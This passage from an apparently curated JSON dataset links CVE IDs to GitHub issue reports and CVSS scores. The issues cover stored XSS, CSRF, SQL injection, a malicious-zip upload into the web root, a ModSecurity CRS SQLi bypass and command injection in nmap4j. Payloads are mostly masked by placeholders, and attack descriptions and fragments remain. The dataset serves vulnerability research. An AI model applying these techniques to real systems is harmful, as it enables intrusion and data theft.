  88817. },
  88818. {
  88819. "CVE_ID": "CVE-2018-14837",
  88820. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/673",
  88821. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/673",
  88822. "Repo_new": "wolfcms/wolfcms",
  88823. "Issue_Created_At": "2018-05-03T17:19:44Z",
  88824. "description": "Cross Site Scripting (XSS) Vulnerability in wolfcms NUMBERTAG Hi Team, I have found stored cross site scripting on APITAG NUMBERTAG Description: Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user\u2019s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. Vulnerability Name: Cross Site Scripting Vulnerable URL : URLTAG Steps to Reproduce: Step NUMBERTAG Logged In as a Admin Role Step NUMBERTAG From Snippets Tab edit the Name with APITAG \"> APITAG Step NUMBERTAG It will store the Name as javascript code and it will execute cross site scripting. Vulnerable field is from APITAG tab APITAG Name\" APITAG find attached screenshot) FILETAG XSS Executed Successfully FILETAG It does not sanitize APITAG Name\" from APITAG Tab and it is possible to execute a Stored Cross Site Scripting XSS attacks. Additional information APITAG CMS version NUMBERTAG DB type and version: APITAG NUMBERTAG APITAG >HTTP server type and version: APITAG",
  88825. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  88826. "severity": "MEDIUM",
  88827. "baseScore": 4.8,
  88828. "impactScore": 2.7,
  88829. "exploitabilityScore": 1.7
  88830. },
  88831. {
  88832. "CVE_ID": "CVE-2018-15178",
  88833. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5364",
  88834. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5364",
  88835. "Repo_new": "gogs/gogs",
  88836. "Issue_Created_At": "2018-08-06T06:19:35Z",
  88837. "description": "Insecure function APITAG leads to open redirect vulnerability. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG . APITAG gif: FILETAG A possible fix might look like: CODETAG",
  88838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88839. "severity": "MEDIUM",
  88840. "baseScore": 6.1,
  88841. "impactScore": 2.7,
  88842. "exploitabilityScore": 2.8
  88843. },
  88844. {
  88845. "CVE_ID": "CVE-2018-15567",
  88846. "Issue_Url_old": "https://github.com/boiteasite/cmsuno/issues/7",
  88847. "Issue_Url_new": "https://github.com/boiteasite/cmsuno/issues/7",
  88848. "Repo_new": "boiteasite/cmsuno",
  88849. "Issue_Created_At": "2018-08-10T06:24:19Z",
  88850. "description": "APITAG NUMBERTAG has an XSS vulnerability in the title field. CODETAG FILETAG FILETAG",
  88851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  88852. "severity": "MEDIUM",
  88853. "baseScore": 6.1,
  88854. "impactScore": 2.7,
  88855. "exploitabilityScore": 2.8
  88856. },
  88857. {
  88858. "CVE_ID": "CVE-2018-15846",
  88859. "Issue_Url_old": "https://github.com/mattiapazienti/fledrCMS/issues/2",
  88860. "Issue_Url_new": "https://github.com/mattiapazienti/fledrcms/issues/2",
  88861. "Repo_new": "mattiapazienti/fledrcms",
  88862. "Issue_Created_At": "2018-08-06T01:21:25Z",
  88863. "description": "There is a CSRF vulnerability that can modify the administrator's password. There is a CSRF vulnerability that can change the administrator's password via APITAG POC\uff1a APITAG change the administrator's password CODETAG",
  88864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88865. "severity": "HIGH",
  88866. "baseScore": 8.8,
  88867. "impactScore": 5.9,
  88868. "exploitabilityScore": 2.8
  88869. },
  88870. {
  88871. "CVE_ID": "CVE-2018-16247",
  88872. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/3",
  88873. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/3",
  88874. "Repo_new": "yzmcms/yzmcms",
  88875. "Issue_Created_At": "2018-08-16T05:18:39Z",
  88876. "description": "yzmcms NUMBERTAG SS. FILETAG XSS, payload \uff1a APITAG alert NUMBERTAG APITAG POC\uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG iCMS_redirect_num NUMBERTAG APITAG joomla_user_state=logged_in; APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG &status NUMBERTAG dosubmit NUMBERTAG FILETAG FILETAG \u2014\u2014\u4e2d\u79d1\u5353\u4fe1\u8f6f\u4ef6\u6d4b\u8bc4\u6280\u672f\u4e2d\u5fc3",
  88877. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88878. "severity": "MEDIUM",
  88879. "baseScore": 5.4,
  88880. "impactScore": 2.7,
  88881. "exploitabilityScore": 2.3
  88882. },
  88883. {
  88884. "CVE_ID": "CVE-2018-16370",
  88885. "Issue_Url_old": "https://github.com/lazyphp/PESCMS-TEAM/issues/2",
  88886. "Issue_Url_new": "https://github.com/lazyphp/pescms-team/issues/2",
  88887. "Repo_new": "lazyphp/pescms-team",
  88888. "Issue_Created_At": "2018-08-30T09:23:52Z",
  88889. "description": "PESCMS TEAM NUMBERTAG has a file upload vulnerability in APITAG This page lets a user upgrade the PESCMS system manually. FILETAG Following the APITAG function, the uploaded file extension must be \u201czip\u201d FILETAG and following the unzip function FILETAG and the APITAG function and install function, we can see the file is decompressed into the root directory FILETAG FILETAG So we can create a FILETAG FILETAG, compress it as FILETAG, and upload the FILETAG. FILETAG Finally, the system decompresses evil.zip and writes FILETAG into the root directory; the only check is on the archive's extension, not on the files it extracts. FILETAG",
  88890. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  88891. "severity": "CRITICAL",
  88892. "baseScore": 9.8,
  88893. "impactScore": 5.9,
  88894. "exploitabilityScore": 3.9
  88895. },
  88896. {
  88897. "CVE_ID": "CVE-2018-16379",
  88898. "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/38",
  88899. "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/38",
  88900. "Repo_new": "n00dles/ogma-CMS",
  88901. "Issue_Created_At": "2018-08-10T02:20:41Z",
  88902. "description": "There is a stored XSS vulnerability that can execute JavaScript. There is an XSS vulnerability: open this URL \u201c URLTAG \u201c and log in. Select APITAG Options\" Insert the payload APITAG APITAG \" in APITAG Text footer\" and submit. FILETAG Press F NUMBERTAG to open the developer tools. We can see that this dangerous XSS script was inserted into the page without any filtering or encoding. CODETAG This means that the script will be executed whenever the page is opened, which is dangerous. FILETAG Then we go to the homepage \u201c FILETAG \u201d The malicious XSS script is triggered and a pop-up dialog displays the current user's cookie value. FILETAG",
  88903. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  88904. "severity": "MEDIUM",
  88905. "baseScore": 4.8,
  88906. "impactScore": 2.7,
  88907. "exploitabilityScore": 1.7
  88908. },
  88909. {
  88910. "CVE_ID": "CVE-2018-16384",
  88911. "Issue_Url_old": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1167",
  88912. "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1167",
  88913. "Repo_new": "spiderlabs/owasp-modsecurity-crs",
  88914. "Issue_Created_At": "2018-08-10T07:24:37Z",
  88915. "description": "Bypass the latest crs NUMBERTAG rc3 rules for SQL injection. Vulnerability demo(php+mysql+apache) FILETAG ERRORTAG Download and install the latest NUMBERTAG rc3 rules and enable blocking protection for testing. I found a way to bypass the rules for SQL injection through black box testing. This method is: {\\ APITAG b} , where a is a special function name, such as if, version, etc., and b is the sql statement to be executed. Using the method to successfully bypass the rules for SQL injection, you can see that the database name was successfully read using the error. CODETAG FILETAG In this way, you can use this method to bypass the crs rules and get any content in the database in the vulnerable system. Please fix this security issue as soon as APITAG You.",
  88916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  88917. "severity": "HIGH",
  88918. "baseScore": 7.5,
  88919. "impactScore": 3.6,
  88920. "exploitabilityScore": 3.9
  88921. },
  88922. {
  88923. "CVE_ID": "CVE-2018-16398",
  88924. "Issue_Url_old": "https://github.com/twistlock/authz/issues/50",
  88925. "Issue_Url_new": "https://github.com/twistlock/authz/issues/50",
  88926. "Repo_new": "twistlock/authz",
  88927. "Issue_Created_At": "2018-07-16T12:27:09Z",
  88928. "description": "[security issue] policy bypass. The regular expressions used by Authz are relatively simple and can be bypassed. For example, the policy allows only docker start, and docker pause is not allowed. A normal request to URLTAG is rejected, but accessing the URL PATHTAG bypasses Authz's policy restrictions. In this way the regular expression check is evaded and docker pause runs successfully.",
  88929. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  88930. "severity": "HIGH",
  88931. "baseScore": 7.5,
  88932. "impactScore": 3.6,
  88933. "exploitabilityScore": 3.9
  88934. },
  88935. {
  88936. "CVE_ID": "CVE-2018-16412",
  88937. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1250",
  88938. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1250",
  88939. "Repo_new": "imagemagick/imagemagick",
  88940. "Issue_Created_At": "2018-08-19T14:19:35Z",
  88941. "description": "heap buffer overflow bug in APITAG APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch PATHTAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Feb NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: APITAG May I know whether this can be assigned with a CVE ID?",
  88942. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88943. "severity": "HIGH",
  88944. "baseScore": 8.8,
  88945. "impactScore": 5.9,
  88946. "exploitabilityScore": 2.8
  88947. },
  88948. {
  88949. "CVE_ID": "CVE-2018-16552",
  88950. "Issue_Url_old": "https://github.com/MicroPyramid/Django-CRM/issues/68",
  88951. "Issue_Url_new": "https://github.com/micropyramid/django-crm/issues/68",
  88952. "Repo_new": "micropyramid/django-crm",
  88953. "Issue_Created_At": "2018-09-04T13:25:44Z",
  88954. "description": "CSRF vulnerability almost all forms. For example APITAG creation form has no csrf token validation, so that attacker can create own account by sending malicious link POC : CODETAG EXPLOIT REQUEST: POST PATHTAG HTTP NUMBERTAG Host: django APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en GB,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  88955. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  88956. "severity": "HIGH",
  88957. "baseScore": 8.8,
  88958. "impactScore": 5.9,
  88959. "exploitabilityScore": 2.8
  88960. },
  88961. {
  88962. "CVE_ID": "CVE-2018-16641",
  88963. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1206",
  88964. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1206",
  88965. "Repo_new": "imagemagick/imagemagick",
  88966. "Issue_Created_At": "2018-07-12T07:28:06Z",
  88967. "description": "There is a potential memory leak in codes/tiff.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a potential memory leak vulnerability in APITAG function in coders/tiff.c. Steps to Reproduce As we can see, there is a check for base_image equals to NULL or not in line NUMBERTAG URLTAG At the same time, there are several call to ERRORTAG in line NUMBERTAG line NUMBERTAG line NUMBERTAG and line NUMBERTAG I think base_image should be destroyed firstly before call ERRORTAG Otherwise, there would be a memory leak vulnerability. ERRORTAG System Configuration APITAG APITAG version: latest version Environment APITAG system, version and so on): Additional information: APITAG",
  88968. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  88969. "severity": "MEDIUM",
  88970. "baseScore": 6.5,
  88971. "impactScore": 3.6,
  88972. "exploitabilityScore": 2.8
  88973. },
  88974. {
  88975. "CVE_ID": "CVE-2018-16710",
  88976. "Issue_Url_old": "https://github.com/foosel/OctoPrint/issues/2814",
  88977. "Issue_Url_new": "https://github.com/octoprint/octoprint/issues/2814",
  88978. "Repo_new": "octoprint/octoprint",
  88979. "Issue_Created_At": "2018-09-07T06:20:39Z",
  88980. "description": "APITAG configuration issues can lead to unauthorized access. Unauthorized access due to configuration issues can download configuration files, download videos, and more. URLTAG FILETAG FILETAG FILETAG",
  88981. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  88982. "severity": "CRITICAL",
  88983. "baseScore": 9.1,
  88984. "impactScore": 5.2,
  88985. "exploitabilityScore": 3.9
  88986. },
  88987. {
  88988. "CVE_ID": "CVE-2018-16736",
  88989. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6437",
  88990. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6437",
  88991. "Repo_new": "roundcube/roundcubemail",
  88992. "Issue_Created_At": "2018-09-09T05:25:36Z",
  88993. "description": "Persistent Cross Site Scripting in rcfilters plugin. Hi. when using rcfilters plugin version NUMBERTAG two parameters \"_whatfilter\" and \"_messages\" do not sanitize user input. therefore you can inject javascript code in them. since it's a self XSS, it may not have any security impact. a user can inject js and html code in his/her own account filters list. FILETAG tested on Roundcube Webmail version NUMBERTAG",
  88994. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  88995. "severity": "MEDIUM",
  88996. "baseScore": 5.4,
  88997. "impactScore": 2.7,
  88998. "exploitabilityScore": 2.3
  88999. },
  89000. {
  89001. "CVE_ID": "CVE-2018-16736",
  89002. "Issue_Url_old": "https://github.com/eagle00789/RC_Filters/issues/19",
  89003. "Issue_Url_new": "https://github.com/eagle00789/rc_filters/issues/19",
  89004. "Repo_new": "eagle00789/rc_filters",
  89005. "Issue_Created_At": "2018-09-09T05:25:13Z",
  89006. "description": "Persistent Cross Site Scripting in rcfilters plugin. Hi. when using rcfilters plugin version NUMBERTAG two parameters \"_whatfilter\" and \"_messages\" do not sanitize user input. therefore you can inject javascript code in them. since it's a self XSS, it may not have any security impact. a user can inject js and html code in his/her own account filters list. FILETAG tested on Roundcube Webmail version NUMBERTAG",
  89007. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  89008. "severity": "MEDIUM",
  89009. "baseScore": 5.4,
  89010. "impactScore": 2.7,
  89011. "exploitabilityScore": 2.3
  89012. },
  89013. {
  89014. "CVE_ID": "CVE-2018-16762",
  89015. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/478",
  89016. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/478",
  89017. "Repo_new": "daylightstudio/fuel-cms",
  89018. "Issue_Created_At": "2018-07-09T13:26:39Z",
  89019. "description": "Vulnerability Code Evaluations & SQL Injections. Vulnerability Code Evaluations & SQL Injections Environment Version NUMBERTAG OS : Unix, Windows Web server : Any web server PHP NUMBERTAG Database : Any database Vulnerability Tree NUMBERTAG SQL Injection NUMBERTAG PATHTAG (GET = search_term NUMBERTAG PATHTAG (GET = layout NUMBERTAG PATHTAG (GET = published NUMBERTAG Code Evaluation NUMBERTAG PATHTAG (GET = filter NUMBERTAG fuel/preview (POST = data NUMBERTAG SQL Injection in PATHTAG (GET = search_term) URL: PATHTAG APITAG APITAG APITAG Parameter Name: search_term Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG SQL Injection in PATHTAG (GET = layout) URL: PATHTAG APITAG APITAG APITAG Parameter Name: layout Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG SQL Injection in PATHTAG (GET = published) URL: PATHTAG APITAG APITAG APITAG Parameter Name: published Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG Code Evaluation in PATHTAG (GET = filter) URL: PATHTAG APITAG NUMBERTAG b NUMBERTAG Parameter Name: filter Parameter Type: GET Attack Pattern NUMBERTAG b APITAG NUMBERTAG b NUMBERTAG Code Evaluation in /fuel/preview (POST = data) URL: PATHTAG Parameter Name: data Parameter Type: POST Attack Pattern NUMBERTAG b APITAG NUMBERTAG b NUMBERTAG",
  89020. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89021. "severity": "CRITICAL",
  89022. "baseScore": 9.8,
  89023. "impactScore": 5.9,
  89024. "exploitabilityScore": 3.9
  89025. },
  89026. {
  89027. "CVE_ID": "CVE-2018-17228",
  89028. "Issue_Url_old": "https://github.com/narkisr/nmap4j/issues/9",
  89029. "Issue_Url_new": "https://github.com/narkisr/nmap4j/issues/9",
  89030. "Repo_new": "narkisr/nmap4j",
  89031. "Issue_Created_At": "2018-09-19T02:24:35Z",
  89032. "description": "command execution vulnerability. String path = APITAG String op = \" T4 p NUMBERTAG Nmap4j nmap4j = new Nmap4j(path); APITAG FILETAG \"); APITAG APITAG Over here, the APITAG's original intention is to receive hosts. When we add custom commands after it, they will be executed.",
  89033. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89034. "severity": "CRITICAL",
  89035. "baseScore": 9.8,
  89036. "impactScore": 5.9,
  89037. "exploitabilityScore": 3.9
  89038. },
  89039. {
  89040. "CVE_ID": "CVE-2018-17368",
  89041. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/18",
  89042. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/18",
  89043. "Repo_new": "sanluan/publiccms",
  89044. "Issue_Created_At": "2018-09-12T05:24:34Z",
  89045. "description": "There is a brute force vulnerability via PATHTAG when I login, I find that if I use a wrong username: FILETAG So we can use brute force to get the correct username because the correct username has a different response length FILETAG after we get the correct username, use the same way to get the correct password FILETAG FILETAG NUMBERTAG redirect means we logged in successfully",
  89046. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  89047. "severity": "MEDIUM",
  89048. "baseScore": 5.3,
  89049. "impactScore": 1.4,
  89050. "exploitabilityScore": 3.9
  89051. },
  89052. {
  89053. "CVE_ID": "CVE-2018-17419",
  89054. "Issue_Url_old": "https://github.com/miekg/dns/issues/742",
  89055. "Issue_Url_new": "https://github.com/miekg/dns/issues/742",
  89056. "Repo_new": "miekg/dns",
  89057. "Issue_Created_At": "2018-09-19T07:25:24Z",
  89058. "description": "APITAG parsing error leading to nil pointer dereference. What did I do? APITAG ERRORTAG What happened? ERRORTAG",
  89059. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89060. "severity": "HIGH",
  89061. "baseScore": 7.5,
  89062. "impactScore": 3.6,
  89063. "exploitabilityScore": 3.9
  89064. },
  89065. {
  89066. "CVE_ID": "CVE-2018-17846",
  89067. "Issue_Url_old": "https://github.com/golang/go/issues/27842",
  89068. "Issue_Url_new": "https://github.com/golang/go/issues/27842",
  89069. "Repo_new": "golang/go",
  89070. "Issue_Created_At": "2018-09-25T06:25:17Z",
  89071. "description": "PATHTAG APITAG infinite loop via malformed data. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? graceful exit What did you see instead? An infinite loop",
  89072. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89073. "severity": "HIGH",
  89074. "baseScore": 7.5,
  89075. "impactScore": 3.6,
  89076. "exploitabilityScore": 3.9
  89077. },
  89078. {
  89079. "CVE_ID": "CVE-2018-18024",
  89080. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1337",
  89081. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1337",
  89082. "Repo_new": "imagemagick/imagemagick",
  89083. "Issue_Created_At": "2018-10-05T12:25:23Z",
  89084. "description": "infinite loop in APITAG of bmp.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG The following code will trigger an infinite loop when open the poc file which take up a lot of memory and cpu. There is a risk of dos. ERRORTAG Steps to Reproduce APITAG poc URLTAG magick convert $poc /dev/null System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  89085. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89086. "severity": "MEDIUM",
  89087. "baseScore": 6.5,
  89088. "impactScore": 3.6,
  89089. "exploitabilityScore": 2.8
  89090. },
  89091. {
  89092. "CVE_ID": "CVE-2018-18211",
  89093. "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/1",
  89094. "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/1",
  89095. "Repo_new": "pbootcms/pbootcms",
  89096. "Issue_Created_At": "2018-10-08T07:21:34Z",
  89097. "description": "Pbootcms SQL injection in FILETAG . The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG Authorization code required after installation,We can go to this URL and enter our ip to get the authorization code. URL: FILETAG APITAG This SQL injection requires background api functionality. APITAG FILETAG username=admin password NUMBERTAG When the api function is enabled in the background, the foreground api will have SQL injection. URLTAG POST:contacts[content`) VALUES ( APITAG /distinct/ APITAG /FROM/ /ay_user/ /limit NUMBERTAG e NUMBERTAG a NUMBERTAG mobile NUMBERTAG content NUMBERTAG We can get the admin account name and password APITAG",
  89098. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89099. "severity": "HIGH",
  89100. "baseScore": 8.1,
  89101. "impactScore": 5.9,
  89102. "exploitabilityScore": 2.2
  89103. },
  89104. {
  89105. "CVE_ID": "CVE-2018-18290",
  89106. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/9",
  89107. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/9",
  89108. "Repo_new": "gnat/nc-cms",
  89109. "Issue_Created_At": "2018-10-14T19:20:41Z",
  89110. "description": "nc cms Cross Site Scripting. Hello, I found that this cms may have a security problem: you can edit your html on the URLTAG url and you can input any evil js you want APITAG APITAG APITAG",
  89111. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  89112. "severity": "MEDIUM",
  89113. "baseScore": 4.8,
  89114. "impactScore": 2.7,
  89115. "exploitabilityScore": 1.7
  89116. },
  89117. {
  89118. "CVE_ID": "CVE-2018-18409",
  89119. "Issue_Url_old": "https://github.com/simsong/tcpflow/issues/195",
  89120. "Issue_Url_new": "https://github.com/simsong/tcpflow/issues/195",
  89121. "Repo_new": "simsong/tcpflow",
  89122. "Issue_Created_At": "2018-10-15T13:58:19Z",
  89123. "description": "Stack based buffer overflow in APITAG There exists a stack based buffer overflow in APITAG function at APITAG , invoked by APITAG in APITAG . The issue gets triggered when the value of depth in APITAG is set greater than NUMBERTAG being passed to i in APITAG . The APITAG function sets the ith bit to NUMBERTAG in case where the i value exceeds more than NUMBERTAG the computation goes wrong & a stack overflow is triggered. Tested version NUMBERTAG APITAG Command tcpflow a D b m o Fk \u2013r $POC Debugging: APITAG CODETAG Backtrace: ERRORTAG ASAN Report ERRORTAG Note: Issue reproducible when compiled with APITAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
  89124. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  89125. "severity": "MEDIUM",
  89126. "baseScore": 5.5,
  89127. "impactScore": 3.6,
  89128. "exploitabilityScore": 1.8
  89129. },
  89130. {
  89131. "CVE_ID": "CVE-2018-18540",
  89132. "Issue_Url_old": "https://github.com/Teakki/issue/issues/24",
  89133. "Issue_Url_new": "https://github.com/teakki/issue/issues/24",
  89134. "Repo_new": "teakki/issue",
  89135. "Issue_Created_At": "2018-10-20T11:25:33Z",
  89136. "description": "There is an xss. when adding a new document and inserting a picture, it can set the picture's url, so set it with ==> ERRORTAG ,after finishing that, it will pop up a window. APITAG",
  89137. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89138. "severity": "MEDIUM",
  89139. "baseScore": 6.1,
  89140. "impactScore": 2.7,
  89141. "exploitabilityScore": 2.8
  89142. },
  89143. {
  89144. "CVE_ID": "CVE-2018-18541",
  89145. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/1536",
  89146. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/1536",
  89147. "Repo_new": "teeworlds/teeworlds",
  89148. "Issue_Created_At": "2018-10-20T19:20:56Z",
  89149. "description": "CVE: Remote denial of service fixed in NUMBERTAG Hi, apparently version NUMBERTAG and version NUMBERTAG fix a remote denial of service vulnerability in Teeworlds. Did you request a CVE for this security issue? It appears that all versions prior NUMBERTAG are affected. Is this correct? Are these the fixing commits? URLTAG URLTAG",
  89150. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  89151. "severity": "HIGH",
  89152. "baseScore": 7.5,
  89153. "impactScore": 3.6,
  89154. "exploitabilityScore": 3.9
  89155. },
  89156. {
  89157. "CVE_ID": "CVE-2018-18578",
  89158. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/5",
  89159. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/5",
  89160. "Repo_new": "ky-j/dedecms",
  89161. "Issue_Created_At": "2018-10-22T06:23:15Z",
  89162. "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG docx. FILETAG APITAG Phink club",
  89163. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89164. "severity": "MEDIUM",
  89165. "baseScore": 6.1,
  89166. "impactScore": 2.7,
  89167. "exploitabilityScore": 2.8
  89168. },
  89169. {
  89170. "CVE_ID": "CVE-2018-18834",
  89171. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/81",
  89172. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/81",
  89173. "Repo_new": "mz-automation/libiec61850",
  89174. "Issue_Created_At": "2018-10-29T15:52:16Z",
